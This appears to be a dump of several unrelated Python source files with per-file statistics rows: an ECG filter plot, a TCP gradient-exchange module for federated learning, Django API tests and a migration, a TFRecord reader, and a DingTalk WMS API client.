a.set_xlabel('Frequency / Hz')
a.set_ylabel("Magnitude / dB")
a.set_title('Band Stop Filter Frequency Response')
a.plot(W, 20 * np.log10(h))
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# Bandstop filtered signal
x_filtered = sig.lfilter(b, c, x)
f2 = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(312)
a.set_xlabel('Time / s')
a.set_ylabel("Amplitude / mV")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.set_title('band stop filtered ECG')
a.plot(n, x_filtered)
canvas2 = FigureCanvasTkAgg(f2, self)
canvas2.draw()
canvas2.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar2 = NavigationToolbar2Tk(canvas, self)
toolbar2.update()
canvas2._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
f3 = Figure(figsize=(10,6), dpi=100)
a = f.add_subplot(313)
a.set_xlabel("time in s")
a.set_ylabel("ECG in mV")
a.set_title("ECG Signal")
a.set_xlim(46.5, 50)
a.set_ylim(-2, 1.5)
a.plot(n, x)
canvas = FigureCanvasTkAgg(f3, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
toolbar = NavigationToolbar2Tk(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True, padx=2, pady=2)
f.tight_layout()
f2.tight_layout()
f3.tight_layout()
app = window()
app.mainloop()
| 35.690476 | 153 | 0.581888 | 3,078 | 23,984 | 4.405458 | 0.083821 | 0.019764 | 0.027581 | 0.037611 | 0.861873 | 0.854794 | 0.845796 | 0.808702 | 0.806637 | 0.799263 | 0 | 0.034002 | 0.297365 | 23,984 | 671 | 154 | 35.743666 | 0.77065 | 0.056371 | 0 | 0.778509 | 0 | 0 | 0.098873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037281 | false | 0.059211 | 0.028509 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
389447cd0ae02aece4469f61ed2b870c99442339 | 12,514 | py | Python | socket_com/TCPSocket.py | vineeths96/Federated-Learning | ef0b46385c421edcfca8fcbd24371a2d9b70fe78 | [
"MIT"
] | null | null | null | socket_com/TCPSocket.py | vineeths96/Federated-Learning | ef0b46385c421edcfca8fcbd24371a2d9b70fe78 | [
"MIT"
] | null | null | null | socket_com/TCPSocket.py | vineeths96/Federated-Learning | ef0b46385c421edcfca8fcbd24371a2d9b70fe78 | [
"MIT"
] | null | null | null | import io
import time
import torch
import socket
import threading
from seed import set_seed
BUFFER = 1024 * 64
class TCPServer:
def __init__(
self,
SERVER=socket.gethostbyname(socket.gethostname()),
PORT=5050,
NUM_CLIENTS=1,
GRADIENT_SIZE=14728266,
DELAY=5e-3,
SEED=42,
):
self.SERVER = SERVER
self.PORT = PORT
self.NUM_CLIENTS = NUM_CLIENTS
self.GRADIENT_SIZE = GRADIENT_SIZE
self.DELAY = DELAY
self.SEED = SEED
self.ADDR = (SERVER, PORT)
self.END_OF_MESSAGE = torch.tensor(float("inf"))
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# self.SEND_BUF_SIZE = 4096
# self.RECV_BUF_SIZE = 4096
#
# self.server.setsockopt(
# socket.SOL_SOCKET,
# socket.SO_SNDBUF,
# self.SEND_BUF_SIZE)
# self.server.setsockopt(
# socket.SOL_SOCKET,
# socket.SO_RCVBUF,
# self.RECV_BUF_SIZE)
self.server.bind(self.ADDR)
self.accumulated_gradient = torch.zeros(self.GRADIENT_SIZE)
def encode(self, tensor):
file = io.BytesIO()
torch.save(tensor, file)
packet_size = len(file.getvalue())
header = "{0}:".format(packet_size)
header = bytes(header.encode())
encoded = bytearray()
encoded += header
file.seek(0)
encoded += file.read()
return encoded
def decode(self, buffer):
tensor = torch.load(io.BytesIO(buffer))
return tensor
def send(self, tensor, conn):
encoded_message = self.encode(tensor)
conn.send(encoded_message)
# time.sleep(self.DELAY)
# self.send_EOT(conn)
def send_EOT(self, conn):
encoded_message = self.encode(self.END_OF_MESSAGE)
conn.send(encoded_message)
def receive(self, conn, addr):
length = None
buffer = bytearray()
readnext = True
while readnext:
msg = conn.recv(BUFFER)
buffer += msg
if len(buffer) == length:
break
while True:
if length is None:
if b":" not in buffer:
break
length_str, ignored, buffer = buffer.partition(b":")
length = int(length_str)
if len(buffer) < length:
break
buffer = buffer[length:]
length = None
break
msg = self.decode(buffer)
print(f"[{addr}] {msg}")
gradient = msg
self.accumulated_gradient += gradient
return
def start(self):
self.server.listen()
print(f"[LISTENING] Server is listening on {self.SERVER}")
try:
clients = []
client_count = 0
while True:
conn, addr = self.server.accept()
clients.append(conn)
client_count += 1
thread = threading.Thread(target=self.receive, args=(conn, addr))
thread.start()
thread.join()
# print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
if threading.activeCount() == 1 and client_count == self.NUM_CLIENTS:
for client in clients:
self.send(self.accumulated_gradient, client)
client.shutdown(1)
client.close()
clients = []
client_count = 0
self.accumulated_gradient.zero_()
except KeyboardInterrupt:
self.stop()
def stop(self):
self.server.shutdown(1)
self.server.close()
class TCPClient:
def __init__(
self,
SERVER=socket.gethostbyname(socket.gethostname()),
PORT=5050,
GRADIENT_SIZE=14728266,
DELAY=5e-3,
SEED=42,
):
self.SERVER = SERVER
self.PORT = PORT
self.GRADIENT_SIZE = GRADIENT_SIZE
self.DELAY = DELAY
self.SEED = SEED
self.ADDR = (SERVER, PORT)
self.DISCONNECT_MESSAGE = torch.tensor(float("inf"))
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect(self.ADDR)
def encode(self, tensor):
file = io.BytesIO()
torch.save(tensor, file)
packet_size = len(file.getvalue())
header = "{0}:".format(packet_size)
header = bytes(header.encode())
encoded = bytearray()
encoded += header
file.seek(0)
encoded += file.read()
return encoded
def decode(self, buffer):
tensor = torch.load(io.BytesIO(buffer))
return tensor
def send(self, tensor):
message = self.encode(tensor)
self.client.send(message)
# time.sleep(self.DELAY)
# self.send_EOT()
def send_EOT(self):
encoded_message = self.encode(self.DISCONNECT_MESSAGE)
self.client.sendto(encoded_message, self.ADDR)
def receive(self):
length = None
buffer = bytearray()
readnext = True
while readnext:
msg = self.client.recv(BUFFER)
buffer += msg
if len(buffer) == length:
break
while True:
if length is None:
if b":" not in buffer:
break
length_str, ignored, buffer = buffer.partition(b":")
length = int(length_str)
if len(buffer) < length:
break
buffer = buffer[length:]
length = None
break
msg = self.decode(buffer)
return msg
class TCPKServer:
def __init__(
self,
SERVER=socket.gethostbyname(socket.gethostname()),
PORT=5050,
NUM_CLIENTS=1,
GRADIENT_SIZE=14728266,
K=10000,
DELAY=5e-3,
SEED=42,
):
self.SERVER = SERVER
self.PORT = PORT
self.NUM_CLIENTS = NUM_CLIENTS
self.K = K
self.GRADIENT_SIZE = GRADIENT_SIZE
self.DELAY = DELAY
self.SEED = SEED
self.ADDR = (SERVER, PORT)
self.END_OF_MESSAGE = torch.tensor(float("inf"))
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# self.SEND_BUF_SIZE = 4096
# self.RECV_BUF_SIZE = 4096
#
# self.server.setsockopt(
# socket.SOL_SOCKET,
# socket.SO_SNDBUF,
# self.SEND_BUF_SIZE)
# self.server.setsockopt(
# socket.SOL_SOCKET,
# socket.SO_RCVBUF,
# self.RECV_BUF_SIZE)
self.server.bind(self.ADDR)
self._indices_queue = []
self.accumulated_gradient = torch.zeros(self.GRADIENT_SIZE)
def encode(self, tensor):
file = io.BytesIO()
torch.save(tensor, file)
packet_size = len(file.getvalue())
header = "{0}:".format(packet_size)
header = bytes(header.encode())
encoded = bytearray()
encoded += header
file.seek(0)
encoded += file.read()
return encoded
def decode(self, buffer):
tensor = torch.load(io.BytesIO(buffer))
return tensor
def send(self, tensor, conn):
encoded_message = self.encode(tensor)
conn.send(encoded_message)
# time.sleep(self.DELAY)
# self.send_EOT(conn)
def send_EOT(self, conn):
encoded_message = self.encode(self.END_OF_MESSAGE)
conn.send(encoded_message)
def receive(self, conn, addr):
length = None
buffer = bytearray()
readnext = True
while readnext:
msg = conn.recv(BUFFER)
buffer += msg
if len(buffer) == length:
break
while True:
if length is None:
if b":" not in buffer:
break
length_str, ignored, buffer = buffer.partition(b":")
length = int(length_str)
if len(buffer) < length:
break
buffer = buffer[length:]
length = None
break
msg = self.decode(buffer)
print(f"[{addr}] {msg}")
indices = msg[:, 0].long()
gradient = msg[:, 1]
self.accumulated_gradient[indices] += gradient
return
def start(self):
self.server.listen()
print(f"[LISTENING] Server is listening on {self.SERVER}")
try:
clients = []
client_count = 0
while True:
conn, addr = self.server.accept()
clients.append(conn)
client_count += 1
thread = threading.Thread(target=self.receive, args=(conn, addr))
thread.start()
thread.join()
# print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
if threading.activeCount() == 1 and client_count == self.NUM_CLIENTS:
if not self._indices_queue:
set_seed(self.SEED)
self._indices_queue = torch.randperm(self.GRADIENT_SIZE).split(self.K)
self._indices_queue = list(self._indices_queue)
RandK_indices = self._indices_queue.pop().long()
RandK_flat_grad = self.accumulated_gradient[RandK_indices]
accumulated_grad_indices = torch.vstack([RandK_indices, RandK_flat_grad]).T
print(RandK_indices)
for client in clients:
self.send(accumulated_grad_indices, client)
client.shutdown(1)
client.close()
clients = []
client_count = 0
self.accumulated_gradient.zero_()
except KeyboardInterrupt:
self.stop()
def stop(self):
self.server.shutdown(1)
self.server.close()
class TCPKClient:
def __init__(
self,
SERVER=socket.gethostbyname(socket.gethostname()),
PORT=5050,
GRADIENT_SIZE=14728266,
K=10000,
DELAY=5e-3,
SEED=42,
):
self.SERVER = SERVER
self.PORT = PORT
self.GRADIENT_SIZE = GRADIENT_SIZE
self.K = K
self.DELAY = DELAY
self.SEED = SEED
self.ADDR = (SERVER, PORT)
self.DISCONNECT_MESSAGE = torch.tensor(float("inf"))
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect(self.ADDR)
def encode(self, tensor):
file = io.BytesIO()
torch.save(tensor, file)
packet_size = len(file.getvalue())
header = "{0}:".format(packet_size)
header = bytes(header.encode())
encoded = bytearray()
encoded += header
file.seek(0)
encoded += file.read()
return encoded
def decode(self, buffer):
tensor = torch.load(io.BytesIO(buffer))
return tensor
def send(self, tensor):
message = self.encode(tensor)
self.client.send(message)
# time.sleep(self.DELAY)
# self.send_EOT()
def send_EOT(self):
encoded_message = self.encode(self.DISCONNECT_MESSAGE)
self.client.sendto(encoded_message, self.ADDR)
def receive(self):
length = None
buffer = bytearray()
readnext = True
while readnext:
msg = self.client.recv(BUFFER)
buffer += msg
if len(buffer) == length:
break
while True:
if length is None:
if b":" not in buffer:
break
length_str, ignored, buffer = buffer.partition(b":")
length = int(length_str)
if len(buffer) < length:
break
buffer = buffer[length:]
length = None
break
msg = self.decode(buffer)
return msg
| 25.696099 | 95 | 0.52645 | 1,291 | 12,514 | 4.973664 | 0.108443 | 0.043607 | 0.028656 | 0.021181 | 0.91045 | 0.91045 | 0.902352 | 0.902352 | 0.902352 | 0.902352 | 0 | 0.015875 | 0.375819 | 12,514 | 486 | 96 | 25.748971 | 0.806171 | 0.060812 | 0 | 0.917431 | 0 | 0 | 0.013652 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085627 | false | 0 | 0.018349 | 0 | 0.152905 | 0.015291 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
38a6d90eb13f6ddfd8bb6578adc02d2d71f71bb0 | 5,603 | py | Python | tests/ozpcenter_api/test_api_listing_feedback.py | emosher/ozp-backend | d31d00bb8a28a8d0c999813f616b398f41516244 | [
"Apache-2.0"
] | 1 | 2018-10-05T17:03:01.000Z | 2018-10-05T17:03:01.000Z | tests/ozpcenter_api/test_api_listing_feedback.py | emosher/ozp-backend | d31d00bb8a28a8d0c999813f616b398f41516244 | [
"Apache-2.0"
] | 1 | 2017-01-06T19:20:32.000Z | 2017-01-06T19:20:32.000Z | tests/ozpcenter_api/test_api_listing_feedback.py | emosher/ozp-backend | d31d00bb8a28a8d0c999813f616b398f41516244 | [
"Apache-2.0"
] | 7 | 2016-12-16T15:42:05.000Z | 2020-09-05T01:11:27.000Z | from django.test import override_settings
from ozpcenter.scripts import sample_data_generator as data_gen
from tests.ozp.cases import APITestCase
from tests.ozpcenter.helper import APITestHelper
@override_settings(ES_ENABLED=False)
class ListingFeedbackApiTest(APITestCase):
@classmethod
def setUpTestData(cls):
data_gen.run()
def setUp(self):
pass
def test_no_feedback_listing(self):
url = '/api/listing/1/feedback/'
response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=404)
self.assertEqual(response.data['feedback'], 0)
def test_positive_feedback_listing(self):
# Create a positive feedback
url = '/api/listing/1/feedback/'
data = {"feedback": 1}
APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)
# Check to see if created
response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
self.assertEqual(response.data['feedback'], 1)
# Check with a different beta group user to see if feedback exists for said user
response = APITestHelper.request(self, url, 'GET', username='betaraybill', status_code=404)
self.assertEqual(response.data['feedback'], 0)
def test_negative_feedback_listing(self):
# Create a negative feedback
url = '/api/listing/1/feedback/'
data = {"feedback": -1}
APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)
# Check to see if created
response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
self.assertEqual(response.data['feedback'], -1)
# Check with a different beta group user to see if feedback exists for said user
response = APITestHelper.request(self, url, 'GET', username='betaraybill', status_code=404)
self.assertEqual(response.data['feedback'], 0)
def test_two_user_positive_feedback_listing(self):
# Create a positive feedback
url = '/api/listing/1/feedback/'
data = {"feedback": 1}
APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)
# Check to see if created
response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
self.assertEqual(response.data['feedback'], 1)
# Create a positive feedback
url = '/api/listing/1/feedback/'
data = {"feedback": 1}
APITestHelper.request(self, url, 'POST', data=data, username='betaraybill', status_code=201)
# Check to see if created
response = APITestHelper.request(self, url, 'GET', username='betaraybill', status_code=200)
self.assertEqual(response.data['feedback'], 1)
def test_two_user_negative_feedback_listing(self):
# Create a negative feedback
url = '/api/listing/1/feedback/'
data = {"feedback": -1}
APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)
# Check to see if created
response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
self.assertEqual(response.data['feedback'], -1)
# Create a negative feedback
url = '/api/listing/1/feedback/'
data = {"feedback": -1}
APITestHelper.request(self, url, 'POST', data=data, username='betaraybill', status_code=201)
# Check to see if created
response = APITestHelper.request(self, url, 'GET', username='betaraybill', status_code=200)
self.assertEqual(response.data['feedback'], -1)
def test_two_user_diff_feedback_listing(self):
# Create a position feedback
url = '/api/listing/1/feedback/'
data = {"feedback": 1}
APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)
# Check to see if created
response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
self.assertEqual(response.data['feedback'], 1)
# Create a negative feedback
url = '/api/listing/1/feedback/'
data = {"feedback": -1}
APITestHelper.request(self, url, 'POST', data=data, username='betaraybill', status_code=201)
# Check to see if created
response = APITestHelper.request(self, url, 'GET', username='betaraybill', status_code=200)
self.assertEqual(response.data['feedback'], -1)
def test_delete_listing_feedback(self):
# Create a position feedback
url = '/api/listing/1/feedback/'
data = {"feedback": 1}
APITestHelper.request(self, url, 'POST', data=data, username='bettafish', status_code=201)
# Check to see if created
response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=200)
self.assertEqual(response.data['feedback'], 1)
# DELETE
url = '/api/listing/1/feedback/1/'
APITestHelper.request(self, url, 'DELETE', username='bettafish', status_code=204)
# VERIFY
url = '/api/listing/1/feedback/'
response = APITestHelper.request(self, url, 'GET', username='bettafish', status_code=404)
self.assertEqual(response.data['feedback'], 0)
def test_delete_listing_non_existing_feedback(self):
url = '/api/listing/1/feedback/1/'
response = APITestHelper.request(self, url, 'DELETE', username='bettafish', status_code=404)
# TODO ExceptionUnitTestHelper
| 42.12782 | 100 | 0.663395 | 662 | 5,603 | 5.519637 | 0.119335 | 0.049808 | 0.157635 | 0.17734 | 0.884784 | 0.877668 | 0.86289 | 0.86289 | 0.86289 | 0.830049 | 0 | 0.024683 | 0.211851 | 5,603 | 132 | 101 | 42.44697 | 0.802763 | 0.117616 | 0 | 0.730769 | 0 | 0 | 0.164837 | 0.064228 | 0 | 0 | 0 | 0.007576 | 0.166667 | 1 | 0.128205 | false | 0.012821 | 0.051282 | 0 | 0.192308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2a1042b40825c1c8b58e9378405371874b2aab06 | 3,678 | py | Python | usersec/migrations/0010_hpcprojectchangerequest_description_and_more.py | bihealth/hpc-access | ff606b18b18230af2876a791ca706d3b24addb59 | [
"MIT"
] | null | null | null | usersec/migrations/0010_hpcprojectchangerequest_description_and_more.py | bihealth/hpc-access | ff606b18b18230af2876a791ca706d3b24addb59 | [
"MIT"
] | 27 | 2022-02-11T15:51:24.000Z | 2022-03-31T12:11:20.000Z | usersec/migrations/0010_hpcprojectchangerequest_description_and_more.py | bihealth/hpc-access | ff606b18b18230af2876a791ca706d3b24addb59 | [
"MIT"
] | null | null | null | # Generated by Django 4.0.3 on 2022-04-22 10:57
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("usersec", "0009_hpcproject_hpcprojectchangerequest_and_more"),
]
operations = [
migrations.AddField(
model_name="hpcprojectchangerequest",
name="description",
field=models.CharField(
help_text="Additional information about the user", max_length=512, null=True
),
),
migrations.AddField(
model_name="hpcprojectchangerequestversion",
name="description",
field=models.CharField(
help_text="Additional information about the user", max_length=512, null=True
),
),
migrations.AddField(
model_name="hpcprojectcreaterequest",
name="description",
field=models.CharField(
default="some description",
help_text="Additional information about the user",
max_length=512,
),
preserve_default=False,
),
migrations.AddField(
model_name="hpcprojectcreaterequest",
name="name",
field=models.CharField(
default="some-project", help_text="Description of the groups work", max_length=512
),
preserve_default=False,
),
migrations.AddField(
model_name="hpcprojectcreaterequestversion",
name="description",
field=models.CharField(
default="some description",
help_text="Additional information about the user",
max_length=512,
),
preserve_default=False,
),
migrations.AddField(
model_name="hpcprojectcreaterequestversion",
name="name",
field=models.CharField(
default="some-project", help_text="Description of the groups work", max_length=512
),
preserve_default=False,
),
migrations.AlterField(
model_name="hpcproject",
name="group",
field=models.ForeignKey(
help_text="Group that requested project. Group PI is owner of project",
on_delete=django.db.models.deletion.CASCADE,
related_name="%(class)s",
to="usersec.hpcgroup",
),
),
migrations.AlterField(
model_name="hpcprojectcreaterequest",
name="group",
field=models.ForeignKey(
help_text="Group the request belongs to",
on_delete=django.db.models.deletion.CASCADE,
related_name="%(class)s",
to="usersec.hpcgroup",
),
),
migrations.AlterField(
model_name="hpcprojectcreaterequestversion",
name="group",
field=models.ForeignKey(
help_text="Group the request belongs to",
on_delete=django.db.models.deletion.CASCADE,
related_name="%(class)s",
to="usersec.hpcgroup",
),
),
migrations.AlterField(
model_name="hpcprojectversion",
name="group",
field=models.ForeignKey(
help_text="Group that requested project. Group PI is owner of project",
on_delete=django.db.models.deletion.CASCADE,
related_name="%(class)s",
to="usersec.hpcgroup",
),
),
]
| 35.028571 | 98 | 0.548396 | 317 | 3,678 | 6.230284 | 0.233438 | 0.04557 | 0.069873 | 0.082025 | 0.807089 | 0.807089 | 0.783797 | 0.783797 | 0.783797 | 0.783797 | 0 | 0.015625 | 0.356172 | 3,678 | 104 | 99 | 35.365385 | 0.818412 | 0.012235 | 0 | 0.877551 | 1 | 0 | 0.248416 | 0.071606 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.020408 | 0 | 0.05102 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2a22f11728190d8514068475a308da106293bff0 | 1,967 | py | Python | tfrecords_handler/non_moving_window/tfrecord_reader.py | HansikaPH/time-series-forecasting | 23be319a190489bc1464653a3d672edd70ab110b | [
"MIT"
] | 67 | 2019-09-09T14:53:35.000Z | 2022-02-21T08:51:15.000Z | tfrecords_handler/non_moving_window/tfrecord_reader.py | HansikaPH/time-series-forecasting | 23be319a190489bc1464653a3d672edd70ab110b | [
"MIT"
] | 6 | 2019-09-09T06:11:51.000Z | 2019-12-16T04:31:11.000Z | tfrecords_handler/non_moving_window/tfrecord_reader.py | HansikaPH/time-series-forecasting | 23be319a190489bc1464653a3d672edd70ab110b | [
"MIT"
] | 18 | 2019-09-12T02:49:58.000Z | 2022-02-16T11:15:57.000Z | import tensorflow as tf
class TFRecordReader:
def train_data_parser(self, serialized_example):
context_parsed, sequence_parsed = tf.parse_single_sequence_example(
serialized_example,
context_features=({
"sequence_length": tf.FixedLenFeature([], dtype=tf.int64)
}),
sequence_features=({
"input": tf.FixedLenSequenceFeature([1], dtype=tf.float32),
"output": tf.FixedLenSequenceFeature([1], dtype=tf.float32)
})
)
return context_parsed["sequence_length"], sequence_parsed["input"], sequence_parsed["output"]
def validation_data_parser(self, serialized_example):
context_parsed, sequence_parsed = tf.parse_single_sequence_example(
serialized_example,
context_features=({
"sequence_length": tf.FixedLenFeature([], dtype=tf.int64)
}),
sequence_features=({
"input": tf.FixedLenSequenceFeature([1], dtype=tf.float32),
"output": tf.FixedLenSequenceFeature([1], dtype=tf.float32),
"metadata": tf.FixedLenSequenceFeature([1], dtype=tf.float32)
})
)
return context_parsed["sequence_length"], sequence_parsed["input"], sequence_parsed["output"], sequence_parsed[
"metadata"]
def test_data_parser(self, serialized_example):
context_parsed, sequence_parsed = tf.parse_single_sequence_example(
serialized_example,
context_features=({
"sequence_length": tf.FixedLenFeature([], dtype=tf.int64)
}),
sequence_features=({
"input": tf.FixedLenSequenceFeature([1], dtype=tf.float32),
"metadata": tf.FixedLenSequenceFeature([1], dtype=tf.float32)
})
)
return context_parsed["sequence_length"], sequence_parsed["input"], sequence_parsed["metadata"] | 40.979167 | 119 | 0.61515 | 178 | 1,967 | 6.522472 | 0.179775 | 0.120586 | 0.156761 | 0.186908 | 0.916451 | 0.916451 | 0.916451 | 0.916451 | 0.916451 | 0.916451 | 0 | 0.018815 | 0.270463 | 1,967 | 48 | 120 | 40.979167 | 0.790244 | 0 | 0 | 0.65 | 0 | 0 | 0.089431 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0 | 0.025 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2a899c08f519e32983e8213ec16720df5691f28a | 4,556 | py | Python | dingtalk/python/alibabacloud_dingtalk/wms_1_0/client.py | aliyun/dingtalk-sdk | ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5 | [
"Apache-2.0"
] | 15 | 2020-08-27T04:10:26.000Z | 2022-03-07T06:25:42.000Z | dingtalk/python/alibabacloud_dingtalk/wms_1_0/client.py | aliyun/dingtalk-sdk | ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5 | [
"Apache-2.0"
] | 1 | 2020-09-27T01:30:46.000Z | 2021-12-29T09:15:34.000Z | dingtalk/python/alibabacloud_dingtalk/wms_1_0/client.py | aliyun/dingtalk-sdk | ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5 | [
"Apache-2.0"
] | 5 | 2020-08-27T04:07:44.000Z | 2021-12-03T02:55:20.000Z | # -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.core import TeaCore
from alibabacloud_tea_openapi.client import Client as OpenApiClient
from alibabacloud_tea_openapi import models as open_api_models
from alibabacloud_tea_util.client import Client as UtilClient
from alibabacloud_dingtalk.wms_1_0 import models as dingtalkwms__1__0_models
from alibabacloud_tea_util import models as util_models
from alibabacloud_openapi_util.client import Client as OpenApiUtilClient
class Client(OpenApiClient):
"""
*\
"""
def __init__(
self,
config: open_api_models.Config,
):
super().__init__(config)
self._endpoint_rule = ''
if UtilClient.empty(self._endpoint):
self._endpoint = 'api.dingtalk.com'
def query_goods_list(
self,
request: dingtalkwms__1__0_models.QueryGoodsListRequest,
) -> dingtalkwms__1__0_models.QueryGoodsListResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkwms__1__0_models.QueryGoodsListHeaders()
return self.query_goods_list_with_options(request, headers, runtime)
async def query_goods_list_async(
self,
request: dingtalkwms__1__0_models.QueryGoodsListRequest,
) -> dingtalkwms__1__0_models.QueryGoodsListResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkwms__1__0_models.QueryGoodsListHeaders()
return await self.query_goods_list_with_options_async(request, headers, runtime)
def query_goods_list_with_options(
self,
request: dingtalkwms__1__0_models.QueryGoodsListRequest,
headers: dingtalkwms__1__0_models.QueryGoodsListHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkwms__1__0_models.QueryGoodsListResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.next_token):
query['nextToken'] = request.next_token
if not UtilClient.is_unset(request.max_results):
query['maxResults'] = request.max_results
if not UtilClient.is_unset(request.start_time_in_mills):
query['startTimeInMills'] = request.start_time_in_mills
if not UtilClient.is_unset(request.end_time_in_mills):
query['endTimeInMills'] = request.end_time_in_mills
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkwms__1__0_models.QueryGoodsListResponse(),
self.do_roarequest('QueryGoodsList', 'wms_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/wms/goods', 'json', req, runtime)
)
async def query_goods_list_with_options_async(
self,
request: dingtalkwms__1__0_models.QueryGoodsListRequest,
headers: dingtalkwms__1__0_models.QueryGoodsListHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkwms__1__0_models.QueryGoodsListResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.next_token):
query['nextToken'] = request.next_token
if not UtilClient.is_unset(request.max_results):
query['maxResults'] = request.max_results
if not UtilClient.is_unset(request.start_time_in_mills):
query['startTimeInMills'] = request.start_time_in_mills
if not UtilClient.is_unset(request.end_time_in_mills):
query['endTimeInMills'] = request.end_time_in_mills
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkwms__1__0_models.QueryGoodsListResponse(),
await self.do_roarequest_async('QueryGoodsList', 'wms_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/wms/goods', 'json', req, runtime)
)
| 45.108911 | 134 | 0.704565 | 526 | 4,556 | 5.690114 | 0.178707 | 0.012028 | 0.065152 | 0.095222 | 0.814901 | 0.780822 | 0.729703 | 0.729703 | 0.726362 | 0.726362 | 0 | 0.011421 | 0.212028 | 4,556 | 100 | 135 | 45.56 | 0.822284 | 0.017559 | 0 | 0.693182 | 1 | 0 | 0.059615 | 0.012102 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034091 | false | 0 | 0.079545 | 0 | 0.170455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
